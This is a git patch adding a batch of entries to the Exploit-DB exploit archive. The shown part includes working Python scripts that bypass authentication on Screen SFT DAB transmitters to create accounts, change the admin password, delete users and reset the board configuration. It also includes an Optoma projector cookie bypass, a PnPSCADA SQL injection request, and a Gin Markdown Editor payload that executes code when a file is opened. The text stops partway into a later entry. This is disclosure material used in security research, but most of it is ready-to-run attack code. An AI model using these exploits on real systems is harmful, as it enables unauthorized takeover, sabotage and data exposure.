From 0a7adaa3fcdd8a907b3f89e0fdfc59ab67f6ffab Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Wed, 24 May 2023 00:16:34 +0000
Subject: [PATCH] DB: 2023-05-24

40 changes to exploits/shellcodes/ghdb

Optoma 1080PSTX Firmware C02 - Authentication Bypass
Screen SFT DAB 600/C - Authentication Bypass Account Creation
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
Screen SFT DAB 600/C - Authentication Bypass Erase Account
Screen SFT DAB 600/C - Authentication Bypass Password Change
Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)

PnPSCADA v2.x - Unauthenticated PostgreSQL Injection

Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution

Yank Note v3.52.1 (Electron) - Arbitrary Code Execution

Apache Superset 2.0.0 - Authentication Bypass

FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)

PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)

Affiliate Me Version 5.0.1 - SQL Injection

Best POS Management System v1.0 - Unauthenticated Remote Code Execution

Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)

ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)

CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)

e107 v2.3.2 - Reflected XSS

File Thingie 2.5.7 - Remote Code Execution (RCE)

GetSimple CMS v3.3.16 - Remote Code Execution (RCE)

LeadPro CRM v1.0 - SQL Injection

PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)

Prestashop 8.0.4 - CSV injection

Quicklancer v1.0 - SQL Injection

SitemagicCMS 4.4.3 - Remote Code Execution (RCE)

Smart School v1.0 - SQL Injection

Stackposts Social Marketing Tool v1.0 - SQL Injection

thrsrossi Millhouse-Project 1.414 - Remote Code Execution

TinyWebGallery v2.5 - Remote Code Execution (RCE)

WBiz Desk 1.2 - SQL Injection

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup

Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title

Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking

MobileTrans  4.0.11 - Weak Service Privilege Escalation

Trend Micro OfficeScan Client 10.0 - ACL Service LPE
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
---
 exploits/hardware/remote/51444.txt  |  23 ++++
 exploits/hardware/remote/51455.py   | 102 +++++++++++++++
 exploits/hardware/remote/51456.py   | 102 +++++++++++++++
 exploits/hardware/remote/51457.py   |  94 ++++++++++++++
 exploits/hardware/remote/51458.py   |  96 +++++++++++++++
 exploits/hardware/remote/51459.py   |  93 ++++++++++++++
 exploits/hardware/remote/51460.txt  |  45 +++++++
 exploits/hardware/webapps/51448.txt |  22 ++++
 exploits/multiple/local/51469.txt   |  25 ++++
 exploits/multiple/local/51470.txt   |  28 +++++
 exploits/multiple/webapps/51447.py  | 105 ++++++++++++++++
 exploits/multiple/webapps/51452.py  | 115 +++++++++++++++++
 exploits/multiple/webapps/51480.txt |  30 +++++
 exploits/php/webapps/51436.py       |  12 +-
 exploits/php/webapps/51443.txt      | 124 +++++++++++++++++++
 exploits/php/webapps/51445.txt      |  38 ++++++
 exploits/php/webapps/51449.txt      | 150 +++++++++++++++++++++++
 exploits/php/webapps/51450.php      |  84 +++++++++++++
 exploits/php/webapps/51451.txt      |  28 +++++
 exploits/php/webapps/51454.txt      | 184 ++++++++++++++++++++++++++++
 exploits/php/webapps/51462.py       | 148 ++++++++++++++++++++++
 exploits/php/webapps/51463.txt      |  20 +++
 exploits/php/webapps/51464.txt      |  63 ++++++++++
 exploits/php/webapps/51465.txt      |  45 +++++++
 exploits/php/webapps/51468.txt      |  28 +++++
 exploits/php/webapps/51471.txt      |  45 +++++++
 exploits/php/webapps/51472.txt      |  43 +++++++
 exploits/php/webapps/51473.txt      |  34 +++++
 exploits/php/webapps/51474.txt      |  36 ++++++
 exploits/php/webapps/51475.py       | 140 +++++++++++++++++++++
 exploits/php/webapps/51476.txt      |  64 ++++++++++
 exploits/php/webapps/51477.txt      |  17 +++
 exploits/php/webapps/51478.txt      |  27 ++++
 exploits/ruby/webapps/51446.txt     |  55 +++++++++
 exploits/windows/local/51453.txt    |  91 ++++++++++++++
 exploits/windows/local/51461.txt    |  48 ++++++++
 exploits/windows/local/51479.txt    |  53 ++++++++
 exploits/windows/webapps/51466.txt  |  23 ++++
 exploits/windows/webapps/51467.txt  |  19 +++
 files_exploits.csv                  |  40 +++++-
 40 files changed, 2532 insertions(+), 7 deletions(-)
 create mode 100644 exploits/hardware/remote/51444.txt
 create mode 100755 exploits/hardware/remote/51455.py
 create mode 100755 exploits/hardware/remote/51456.py
 create mode 100755 exploits/hardware/remote/51457.py
 create mode 100755 exploits/hardware/remote/51458.py
 create mode 100755 exploits/hardware/remote/51459.py
 create mode 100644 exploits/hardware/remote/51460.txt
 create mode 100644 exploits/hardware/webapps/51448.txt
 create mode 100644 exploits/multiple/local/51469.txt
 create mode 100644 exploits/multiple/local/51470.txt
 create mode 100755 exploits/multiple/webapps/51447.py
 create mode 100755 exploits/multiple/webapps/51452.py
 create mode 100644 exploits/multiple/webapps/51480.txt
 create mode 100644 exploits/php/webapps/51443.txt
 create mode 100644 exploits/php/webapps/51445.txt
 create mode 100644 exploits/php/webapps/51449.txt
 create mode 100644 exploits/php/webapps/51450.php
 create mode 100644 exploits/php/webapps/51451.txt
 create mode 100644 exploits/php/webapps/51454.txt
 create mode 100755 exploits/php/webapps/51462.py
 create mode 100644 exploits/php/webapps/51463.txt
 create mode 100644 exploits/php/webapps/51464.txt
 create mode 100644 exploits/php/webapps/51465.txt
 create mode 100644 exploits/php/webapps/51468.txt
 create mode 100644 exploits/php/webapps/51471.txt
 create mode 100644 exploits/php/webapps/51472.txt
 create mode 100644 exploits/php/webapps/51473.txt
 create mode 100644 exploits/php/webapps/51474.txt
 create mode 100755 exploits/php/webapps/51475.py
 create mode 100644 exploits/php/webapps/51476.txt
 create mode 100644 exploits/php/webapps/51477.txt
 create mode 100644 exploits/php/webapps/51478.txt
 create mode 100644 exploits/ruby/webapps/51446.txt
 create mode 100644 exploits/windows/local/51453.txt
 create mode 100644 exploits/windows/local/51461.txt
 create mode 100644 exploits/windows/local/51479.txt
 create mode 100644 exploits/windows/webapps/51466.txt
 create mode 100644 exploits/windows/webapps/51467.txt

diff --git a/exploits/hardware/remote/51444.txt b/exploits/hardware/remote/51444.txt
new file mode 100644
index 000000000..598268172
--- /dev/null
+++ b/exploits/hardware/remote/51444.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
+# Date: 2023/05/09
+# Exploit Author: Anthony Cole
+# Contact: http://twitter.com/acole76
+# Website: http://twitter.com/acole76
+# Vendor Homepage: http://optoma.com
+# Version: Optoma 1080PSTX Firmware C02
+# Tested on: N/A
+# CVE : CVE-2023-27823
+
+Details
+By default the web interface of the 1080PSTX requires a username and password to access the application control panel.  However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".
+
+GET /index.asp HTTP/1.1
+Host: projector
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: atop=1
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/remote/51455.py b/exploits/hardware/remote/51455.py
new file mode 100755
index 000000000..086a45150
--- /dev/null
+++ b/exploits/hardware/remote/51455.py
@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+#                   Bios firmware: 7.1 (Apr 19 2021)
+#                   Gui: 2.46
+#                   FPGA: 169.55
+#                   uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+#            MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5771
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+    '''
+██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
+██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
+██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
+██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
+██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
+    '''
+    +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+    '''
+            ZSL and the Producers insist that no one
+           submit any exploits of themselfs or others
+              performing any dangerous activities.
+                 We will not open or view them.
+    '''
+    +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+u=input('Enter desired username: ')
+p=input('Enter desired password: ')
+e='/system/api/userManager.cgx'
+m5=hashlib.md5()
+m5.update(p.encode('utf-8'))
+h=m5.hexdigest()
+print('Your sig:',h)
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::newUser')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+    'Accept':'application/json, text/plain, */*',
+    'Accept-Language':'ku-MK,en;q=0.9',
+    'Accept-Encoding':'gzip, deflate',
+    'User-Agent':'Dabber++',
+    'Connection':'close'}
+j={'ssbtIdx':0,
+   'ssbtType':'userManager',
+   'ssbtObj':{
+             'newUser':{
+                       'password':h,
+                       'type':'OPERATOR',
+                       'username':u
+                       }
+             },
+   }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+    print('Done.')
+else:
+    print('Error')
+exit(-5)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51456.py b/exploits/hardware/remote/51456.py
new file mode 100755
index 000000000..bb87cc5e3
--- /dev/null
+++ b/exploits/hardware/remote/51456.py
@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+#                   Bios firmware: 7.1 (Apr 19 2021)
+#                   Gui: 2.46
+#                   FPGA: 169.55
+#                   uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+#            MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5772
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+    '''
+██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
+██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
+██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
+██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
+██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
+    '''
+    +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+    '''
+            ZSL and the Producers insist that no one
+           submit any exploits of themselfs or others
+              performing any dangerous activities.
+                 We will not open or view them.
+    '''
+    +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+u=input('Enter desired username: ')
+p=input('Enter desired password: ')
+e='/system/api/userManager.cgx'
+m5=hashlib.md5()
+m5.update(p.encode('utf-8'))
+h=m5.hexdigest()
+print('Your sig:',h)
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::changeUserPswd')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+    'Accept':'application/json, text/plain, */*',
+    'Accept-Language':'ku-MK,en;q=0.9',
+    'Accept-Encoding':'gzip, deflate',
+    'User-Agent':'Dabber+',
+    'Connection':'close'}
+j={'ssbtIdx':0,
+   'ssbtType':'userManager',
+   'ssbtObj':{
+             'changeUserPswd':{
+                              'username':u,
+                              'password':h
+                              }
+             },
+   }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+    print('Done.')
+else:
+    print('Error')
+exit(-4)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51457.py b/exploits/hardware/remote/51457.py
new file mode 100755
index 000000000..4e46b9247
--- /dev/null
+++ b/exploits/hardware/remote/51457.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+#                   Bios firmware: 7.1 (Apr 19 2021)
+#                   Gui: 2.46
+#                   FPGA: 169.55
+#                   uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+#            MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5773
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+    '''
+██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
+██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
+██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
+██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
+██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
+    '''
+    +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+    '''
+            ZSL and the Producers insist that no one
+           submit any exploits of themselfs or others
+              performing any dangerous activities.
+                 We will not open or view them.
+    '''
+    +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+u=input('Enter desired username: ')
+e='/system/api/userManager.cgx'
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::removeUser')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+    'Accept':'application/json, text/plain, */*',
+    'Accept-Language':'ku-MK,en;q=0.9',
+    'Accept-Encoding':'gzip, deflate',
+    'User-Agent':'Dabber-',
+    'Connection':'close'}
+j={'ssbtIdx':0,
+   'ssbtType':'userManager',
+   'ssbtObj':{
+             'removeUser':u
+             }
+   }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+    print('Done.')
+else:
+    print('Error')
+exit(-3)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51458.py b/exploits/hardware/remote/51458.py
new file mode 100755
index 000000000..ea2c28943
--- /dev/null
+++ b/exploits/hardware/remote/51458.py
@@ -0,0 +1,96 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+#                   Bios firmware: 7.1 (Apr 19 2021)
+#                   Gui: 2.46
+#                   FPGA: 169.55
+#                   uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: This exploit circumvents the control and requirement of admin's
+# old password and directly changes the password.
+#
+# Tested on: Keil-EWEB/2.1
+#            MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5774
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+    '''
+██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
+██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
+██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
+██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
+██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
+    '''
+    +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+    '''
+            ZSL and the Producers insist that no one
+           submit any exploits of themselfs or others
+              performing any dangerous activities.
+                 We will not open or view them.
+    '''
+    +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+p=input('Enter desired password: ')
+e='/system/api/userManager.cgx'
+m5=hashlib.md5()
+m5.update(p.encode('utf-8'))
+h=m5.hexdigest()
+print('Your sig:',h)
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::changeUserPswd')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+    'Accept':'application/json, text/plain, */*',
+    'Accept-Language':'ku-MK,en;q=0.9',
+    'Accept-Encoding':'gzip, deflate',
+    'User-Agent':'Dabber-+',
+    'Connection':'close'}
+j={'ssbtIdx':0,
+   'ssbtType':'userManager',
+   'ssbtObj':{
+             'changeUserPswd':{
+                              'username':'admin',
+                              'password':h
+                              }
+             },
+   }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+    print('Done.')
+else:
+    print('Error')
+exit(-2)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51459.py b/exploits/hardware/remote/51459.py
new file mode 100755
index 000000000..39cbf1304
--- /dev/null
+++ b/exploits/hardware/remote/51459.py
@@ -0,0 +1,93 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+#                   Bios firmware: 7.1 (Apr 19 2021)
+#                   Gui: 2.46
+#                   FPGA: 169.55
+#                   uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+#            MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5775
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+    '''
+██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████
+██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██
+██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████
+██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██
+██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██
+    '''
+    +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+    '''
+            ZSL and the Producers insist that no one
+           submit any exploits of themselfs or others
+              performing any dangerous activities.
+                 We will not open or view them.
+    '''
+    +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+e='/system/api/deviceManagement.cgx'
+print('Calling object: ssbtObj')
+print('CGX fastcall: deviceManagement::reset')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+    'Accept':'application/json, text/plain, */*',
+    'Accept-Language':'ku-MK,en;q=0.9',
+    'Accept-Encoding':'gzip, deflate',
+    'User-Agent':'Dabber--',
+    'Connection':'close'}
+j={'ssbtIdx':0,
+   'ssbtType':'deviceManagement',
+   'ssbtObj':{
+             'reset':'true'
+             }
+   }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+    print('Done.')
+else:
+    print('Error')
+exit(-1)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51460.txt b/exploits/hardware/remote/51460.txt
new file mode 100644
index 000000000..879b81ead
--- /dev/null
+++ b/exploits/hardware/remote/51460.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
+# Exploit Author: LiquidWorm
+
+Vendor: DB Elettronica Telecomunicazioni SpA
+Product web page: https://www.screen.it | https://www.dbbroadcast.com
+                  https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+Affected version: Firmware: 1.9.3
+                  Bios firmware: 7.1 (Apr 19 2021)
+                  Gui: 2.46
+                  FPGA: 169.55
+                  uc: 6.15
+
+Summary: Screen's new radio DAB Transmitter is reaching the highest
+technology level in both Digital Signal Processing and RF domain.
+SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+digital adaptive precorrection and configuatio flexibility, the Hot
+Swap System technology, the compactness and the smart system design,
+the SFT DAB are advanced transmitters. They support standards DAB,
+DAB+ and T-DMB and are compatible with major headend brands.
+
+Desc: Screen is affected by an information disclosure vulnerability
+due to improper access control enforcement. An unauthenticated remote
+attacker can exploit this, via a specially crafted request to gain
+access to sensitive information including usernames and source IP
+addresses.
+
+Tested on: Keil-EWEB/2.1
+           MontaVista® Linux® Carrier Grade eXpress (CGX)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5776
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
+
+
+19.03.2023
+
+--
+
+
+$ curl 'http://SFTDAB/system/api/userManager.cgx'
+{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51448.txt b/exploits/hardware/webapps/51448.txt
new file mode 100644
index 000000000..2bb6425fa
--- /dev/null
+++ b/exploits/hardware/webapps/51448.txt
@@ -0,0 +1,22 @@
+# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
+# Date: 15/5/2023
+# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
+# Vendor Homepage: https://pnpscada.com/
+# Version: PnPSCADA (cross platforms): v2.x
+# Tested on: Unix
+# CVE : CVE-2023-1934
+# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
+
+SQLi crashing point:
+
+GET /hitlogcsv.isp?userids=1337'&startdate=
+2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
+HTTP/1.1
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
+AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
+Safari/534.14
+Host: vulnerablepnpscada.int
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
\ No newline at end of file
diff --git a/exploits/multiple/local/51469.txt b/exploits/multiple/local/51469.txt
new file mode 100644
index 000000000..b699fb0c4
--- /dev/null
+++ b/exploits/multiple/local/51469.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
+# Date: 2023-04-24
+# Exploit Author: 8bitsec
+# CVE: CVE-2023-31873
+# Vendor Homepage: https://github.com/mariuskueng/gin
+# Software Link: https://github.com/mariuskueng/gin
+# Version: 0.7.4
+# Tested on: [Mac OS 13]
+
+Release Date:
+
+2023-04-24
+
+Product & Service Introduction: Javascript Markdown editor for Mac
+
+Technical Details & Description:
+A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following payload:
+<video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
+
+Opening the file in Gin will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/multiple/local/51470.txt b/exploits/multiple/local/51470.txt
new file mode 100644
index 000000000..2328e25e0
--- /dev/null
+++ b/exploits/multiple/local/51470.txt
@@ -0,0 +1,28 @@
